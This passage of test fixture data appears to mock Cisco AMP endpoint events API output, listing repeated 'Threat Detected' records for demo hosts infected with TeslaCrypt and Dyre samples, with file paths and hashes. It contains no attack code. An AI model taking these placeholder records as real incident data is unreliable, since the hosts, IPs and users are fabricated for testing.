Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228942","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228941","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":897000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228940","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":211000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228939","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228938","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 